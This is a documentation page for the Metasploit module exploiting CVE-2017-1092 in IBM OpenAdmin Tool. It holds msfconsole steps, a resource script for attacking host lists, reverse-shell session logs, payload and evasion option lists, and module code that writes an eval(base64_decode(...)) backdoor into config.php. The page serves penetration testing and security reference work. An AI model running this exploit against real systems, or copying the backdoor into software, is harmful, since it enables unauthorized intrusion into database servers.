IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution
Module: exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec
Source code: modules/exploits/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec.rb
Disclosure date: 2017-05-30
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-1092

This module exploits an unauthenticated remote PHP code execution vulnerability in IBM OpenAdmin Tool included with IBM Informix versions 11.5, 11.7, and 12.1. The 'welcomeServer' SOAP service does not properly validate user input in the 'new_home_page' parameter of the 'saveHomePage' method allowing arbitrary PHP code to be written to the config.php file. The config.php file is executed in most pages within the application, and accessible directly via the web root, resulting in code execution. This module has been tested successfully on IBM OpenAdmin Tool 3.14 on Informix 12.10 Developer Edition (SUSE Linux 11) virtual appliance.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using ibm_openadmin_tool_soap_welcomeserver_exec against a single host

Normally, you can use exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec this way:

msf > use exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec
msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > show targets
    ... a list of targets ...
msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > set TARGET target-id
msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > show options
    ... show and set options ...
msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > exploit

Using ibm_openadmin_tool_soap_welcomeserver_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your ibm_openadmin_tool_soap_welcomeserver_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module exploits an unauthenticated remote PHP code execution vulnerability in IBM OpenAdmin Tool included with IBM Informix versions 11.5, 11.7, and 12.1.

The welcomeServer SOAP service does not properly validate user input in the new_home_page parameter of the saveHomePage method allowing arbitrary PHP code to be written to the config.php file. The config.php file is executed in most pages within the application, and accessible directly via the web root, resulting in code execution.

Note: If malformed PHP code is written to the config.php file the application fails to process subsequent requests to set new_home_page, rendering the application unexploitable.

For this reason, the module first writes a PHP eval() backdoor to the config.php file, then the payload is provided as PHP code in a HTTP POST request for execution.

By default, a backup of the existing config.php is written to BAKconfig.php. Replacing the config.php file with BAKconfig.php will remove the backdoor.

Vulnerable Application


The IBM® OpenAdmin Tool (OAT) for Informix® is a web application for administering and analyzing the performance of IBM Informix database servers. You can administer multiple database server instances from a single OAT installation on a web server. You can access the web server through any browser to administer all your database servers.

This module has been tested successfully on IBM OpenAdmin Tool 3.14 on Informix 12.10 Developer Edition (SUSE Linux 11) virtual appliance.

Verification Steps


  1. Start msfconsole
  2. Do: exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec
  3. Do: set rhost [IP]
  4. Do: run
  5. You should get a session

Scenarios


IBM OpenAdmin Tool 3.14 on Informix 12.10 Developer Edition (SUSE Linux 11) Virtual Appliance

  msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > check
  [*] 172.16.191.208:80 The target service is running, but could not be validated.
  msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > run

  [*] Started reverse TCP handler on 172.16.191.181:4444 
  [+] 172.16.191.208:80 Wrote backdoor to config.php file successfully
  [*] Sending stage (33986 bytes) to 172.16.191.208
  [*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.208:39840) at 2017-05-31 08:01:49 -0400
  [!] 172.16.191.208:80 Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor

  meterpreter > sysinfo
  Computer    : informixva
  OS          : Linux informixva 2.6.27.39-0.3-vmi #1 SMP 2009-11-23 12:57:38 +0100 i686
  Meterpreter : php/linux
  meterpreter > getuid 
  Server username: daemon (2)
  meterpreter > 

Go back to menu.

Msfconsole Usage


Here is how the multi/http/ibm_openadmin_tool_soap_welcomeserver_exec exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/ibm_openadmin_tool_soap_welcomeserver_exec) > show info

       Name: IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution
     Module: exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-05-30

Provided by:
  SecuriTeam
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Generic (PHP Payload)

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /openadmin       yes       The base path to IBM OpenAdmin Tool
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an unauthenticated remote PHP code execution 
  vulnerability in IBM OpenAdmin Tool included with IBM Informix 
  versions 11.5, 11.7, and 12.1. The 'welcomeServer' SOAP service does 
  not properly validate user input in the 'new_home_page' parameter of 
  the 'saveHomePage' method allowing arbitrary PHP code to be written 
  to the config.php file. The config.php file is executed in most 
  pages within the application, and accessible directly via the web 
  root, resulting in code execution. This module has been tested 
  successfully on IBM OpenAdmin Tool 3.14 on Informix 12.10 Developer 
  Edition (SUSE Linux 11) virtual appliance.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-1092
  https://www.exploit-db.com/exploits/42091
  https://www-01.ibm.com/support/docview.wss?uid=swg22002897
  https://blogs.securiteam.com/index.php/archives/3210
  https://seclists.org/fulldisclosure/2017/May/105

Module Options


This is a complete list of options available in the multi/http/ibm_openadmin_tool_soap_welcomeserver_exec exploit:

msf6 exploit(multi/http/ibm_openadmin_tool_soap_welcomeserver_exec) > show options

Module options (exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /openadmin       yes       The base path to IBM OpenAdmin Tool
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Generic (PHP Payload)

Advanced Options


Here is a complete list of advanced options supported by the multi/http/ibm_openadmin_tool_soap_welcomeserver_exec exploit:

msf6 exploit(multi/http/ibm_openadmin_tool_soap_welcomeserver_exec) > show advanced

Module advanced options (exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/ibm_openadmin_tool_soap_welcomeserver_exec module can exploit:

msf6 exploit(multi/http/ibm_openadmin_tool_soap_welcomeserver_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Generic (PHP Payload)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/ibm_openadmin_tool_soap_welcomeserver_exec exploit:

msf6 exploit(multi/http/ibm_openadmin_tool_soap_welcomeserver_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/ibm_openadmin_tool_soap_welcomeserver_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/ibm_openadmin_tool_soap_welcomeserver_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> Connection failed


Here is a relevant code snippet related to the "<PEER> Connection failed" error message:

77:	  def check
78:	    fingerprint = Rex::Text.rand_text_alpha(rand(10) + 6)
79:	    res = set_home_page "\";##{fingerprint}"
80:	
81:	    unless res
82:	      vprint_status "#{peer} Connection failed"
83:	      return CheckCode::Unknown
84:	    end
85:	
86:	    if res.code == 200 && res.body =~ %r{<ns1:saveHomePageResponse><return xsi:type="xsd:string">";##{fingerprint}</return>}
87:	      return CheckCode::Detected

<PEER> Connection failed


Here is a relevant code snippet related to the "<PEER> Connection failed" error message:

94:	    cmd_param = Rex::Text.rand_text_alpha(rand(10) + 6)
95:	
96:	    res = set_home_page "\";eval(base64_decode($_POST['#{cmd_param}'])); #"
97:	
98:	    unless res
99:	      vprint_status "#{peer} Connection failed"
100:	      return CheckCode::Unknown
101:	    end
102:	
103:	    if res.code == 200 && res.body =~ /<ns1:saveHomePageResponse><return xsi:type="xsd:string">";eval/
104:	      print_good "#{peer} Wrote backdoor to config.php file successfully"

<PEER> Failed to backdoor config.php


Here is a relevant code snippet related to the "<PEER> Failed to backdoor config.php" error message:

101:	    end
102:	
103:	    if res.code == 200 && res.body =~ /<ns1:saveHomePageResponse><return xsi:type="xsd:string">";eval/
104:	      print_good "#{peer} Wrote backdoor to config.php file successfully"
105:	    else
106:	      fail_with Failure::UnexpectedReply, "#{peer} Failed to backdoor config.php"
107:	    end
108:	
109:	    vprint_status "#{peer} Executing payload..."
110:	    send_request_cgi({ 'method'    => 'POST',
111:	                       'uri'       => normalize_uri(target_uri.path, 'conf', 'config.php'),

<PEER> Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor


Here is a relevant code snippet related to the "<PEER> Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor" error message:

106:	      fail_with Failure::UnexpectedReply, "#{peer} Failed to backdoor config.php"
107:	    end
108:	
109:	    vprint_status "#{peer} Executing payload..."
110:	    send_request_cgi({ 'method'    => 'POST',
111:	                       'uri'       => normalize_uri(target_uri.path, 'conf', 'config.php'),
112:	                       'vars_post' => { cmd_param => Rex::Text.encode_base64(payload.encoded) } }, 5)
113:	
114:	    print_warning "#{peer} Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor"
115:	  end
116:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • SecuriTeam
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.